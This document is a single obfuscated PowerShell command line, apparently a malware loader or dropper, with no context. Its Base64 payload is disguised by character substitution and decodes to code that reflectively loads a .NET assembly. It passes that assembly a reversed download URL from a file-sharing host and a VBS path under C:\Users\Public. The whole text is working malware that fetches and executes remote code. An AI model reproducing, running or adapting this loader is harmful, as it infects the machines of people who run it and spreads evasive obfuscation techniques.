"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $DlEAp = 'J℅⚓♲BP℅⚓♲FE℅⚓♲dwBo℅⚓♲GQ℅⚓♲I℅⚓♲℅⚓♲9℅⚓♲C℅⚓♲℅⚓♲Jw℅⚓♲l℅⚓♲Gk℅⚓♲VQBZ℅⚓♲FI℅⚓♲YQ℅⚓♲l℅⚓♲Cc℅⚓♲Ow℅⚓♲k℅⚓♲GU℅⚓♲d℅⚓♲Bh℅⚓♲Hc℅⚓♲Rg℅⚓♲g℅⚓♲D0℅⚓♲I℅⚓♲℅⚓♲n℅⚓♲CU℅⚓♲egBL℅⚓♲EE℅⚓♲QQBZ℅⚓♲CU℅⚓♲Jw℅⚓♲7℅⚓♲Fs℅⚓♲QgB5℅⚓♲HQ℅⚓♲ZQBb℅⚓♲F0℅⚓♲XQ℅⚓♲g℅⚓♲CQ℅⚓♲T℅⚓♲Bi℅⚓♲Fk℅⚓♲awBW℅⚓♲C℅⚓♲℅⚓♲PQ℅⚓♲g℅⚓♲Fs℅⚓♲UwB5℅⚓♲HM℅⚓♲d℅⚓♲Bl℅⚓♲G0℅⚓♲LgBD℅⚓♲G8℅⚓♲bgB2℅⚓♲GU℅⚓♲cgB0℅⚓♲F0℅⚓♲Og℅⚓♲6℅⚓♲EY℅⚓♲cgBv℅⚓♲G0℅⚓♲QgBh℅⚓♲HM℅⚓♲ZQ℅⚓♲2℅⚓♲DQ℅⚓♲UwB0℅⚓♲HI℅⚓♲aQBu℅⚓♲Gc℅⚓♲K℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲ZQB0℅⚓♲GE℅⚓♲dwBG℅⚓♲C4℅⚓♲UgBl℅⚓♲H℅⚓♲℅⚓♲b℅⚓♲Bh℅⚓♲GM℅⚓♲ZQ℅⚓♲o℅⚓♲Cc℅⚓♲kyE6℅⚓♲JMhJw℅⚓♲s℅⚓♲C℅⚓♲℅⚓♲JwBB℅⚓♲Cc℅⚓♲KQ℅⚓♲g℅⚓♲Ck℅⚓♲OwBb℅⚓♲FM℅⚓♲eQBz℅⚓♲HQ℅⚓♲ZQBt℅⚓♲C4℅⚓♲QQBw℅⚓♲H℅⚓♲℅⚓♲R℅⚓♲Bv℅⚓♲G0℅⚓♲YQBp℅⚓♲G4℅⚓♲XQ℅⚓♲6℅⚓♲Do℅⚓♲QwB1℅⚓♲HI℅⚓♲cgBl℅⚓♲G4℅⚓♲d℅⚓♲BE℅⚓♲G8℅⚓♲bQBh℅⚓♲Gk℅⚓♲bg℅⚓♲u℅⚓♲Ew℅⚓♲bwBh℅⚓♲GQ℅⚓♲K℅⚓♲℅⚓♲g℅⚓♲CQ℅⚓♲T℅⚓♲Bi℅⚓♲Fk℅⚓♲awBW℅⚓♲C℅⚓♲℅⚓♲KQ℅⚓♲u℅⚓♲Ec℅⚓♲ZQB0℅⚓♲FQ℅⚓♲eQBw℅⚓♲GU℅⚓♲K℅⚓♲℅⚓♲n℅⚓♲EM℅⚓♲b℅⚓♲Bh℅⚓♲HM℅⚓♲cwBM℅⚓♲Gk℅⚓♲YgBy℅⚓♲GE℅⚓♲cgB5℅⚓♲DM℅⚓♲LgBD℅⚓♲Gw℅⚓♲YQBz℅⚓♲HM℅⚓♲MQ℅⚓♲n℅⚓♲Ck℅⚓♲LgBH℅⚓♲GU℅⚓♲d℅⚓♲BN℅⚓♲GU℅⚓♲d℅⚓♲Bo℅⚓♲G8℅⚓♲Z℅⚓♲℅⚓♲o℅⚓♲Cc℅⚓♲c℅⚓♲By℅⚓♲EY℅⚓♲VgBJ℅⚓♲Cc℅⚓♲KQ℅⚓♲u℅⚓♲Ek℅⚓♲bgB2℅⚓♲G8℅⚓♲awBl℅⚓♲Cg℅⚓♲J℅⚓♲Bu℅⚓♲HU℅⚓♲b℅⚓♲Bs℅⚓♲Cw℅⚓♲I℅⚓♲Bb℅⚓♲G8℅⚓♲YgBq℅⚓♲GU℅⚓♲YwB0℅⚓♲Fs℅⚓♲XQBd℅⚓♲C℅⚓♲℅⚓♲K℅⚓♲℅⚓♲n℅⚓♲GY℅⚓♲Yg℅⚓♲5℅⚓♲DE℅⚓♲NQBh℅⚓♲Dc℅⚓♲NwBh℅⚓♲GY℅⚓♲Z℅⚓♲℅⚓♲1℅⚓♲DY℅⚓♲OQBm℅⚓♲Dg℅⚓♲Mw℅⚓♲3℅⚓♲GQ℅⚓♲M℅⚓♲℅⚓♲z℅⚓♲DE℅⚓♲Yg℅⚓♲w℅⚓♲GE℅⚓♲MQBk℅⚓♲GY℅⚓♲Mg℅⚓♲3℅⚓♲Dk℅⚓♲M℅⚓♲℅⚓♲u℅⚓♲F℅⚓♲℅⚓♲ZwBz℅⚓♲DQ℅⚓♲bwBB℅⚓♲Dk℅⚓♲Mg℅⚓♲v℅⚓♲F8℅⚓♲QgBG℅⚓♲D℅⚓♲℅⚓♲N℅⚓♲BU℅⚓♲F8℅⚓♲Xw℅⚓♲v℅⚓♲GQ℅⚓♲YQBv℅⚓♲Gw℅⚓♲bgB3℅⚓♲G8℅⚓♲R℅⚓♲B0℅⚓♲GM℅⚓♲ZQBy℅⚓♲Gk℅⚓♲Z℅⚓♲℅⚓♲v℅⚓♲GI℅⚓♲ZQB3℅⚓♲C8℅⚓♲bQBv℅⚓♲GM℅⚓♲LgBj℅⚓♲G4℅⚓♲eQBz℅⚓♲DQ℅⚓♲LgB3℅⚓♲Hc℅⚓♲dw℅⚓♲v℅⚓♲C8℅⚓♲OgBz℅⚓♲H℅⚓♲℅⚓♲d℅⚓♲B0℅⚓♲Gg℅⚓♲Jw℅⚓♲g℅⚓♲Cw℅⚓♲I℅⚓♲℅⚓♲k℅⚓♲E8℅⚓♲UQB3℅⚓♲Gg℅⚓♲Z℅⚓♲℅⚓♲g℅⚓♲Cw℅⚓♲I℅⚓♲℅⚓♲n℅⚓♲FQ℅⚓♲cgB1℅⚓♲GU℅⚓♲Jw℅⚓♲g℅⚓♲Ck℅⚓♲I℅⚓♲℅⚓♲p℅⚓♲℅⚓♲==';$blPuG = $DlEAp.replace('℅⚓♲','A') ;$xxjOR = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $blPuG ) ).replace('%zKAAY%','').replace('%iUYRa%','C:\Users\Public\document.vbs');powershell $xxjOR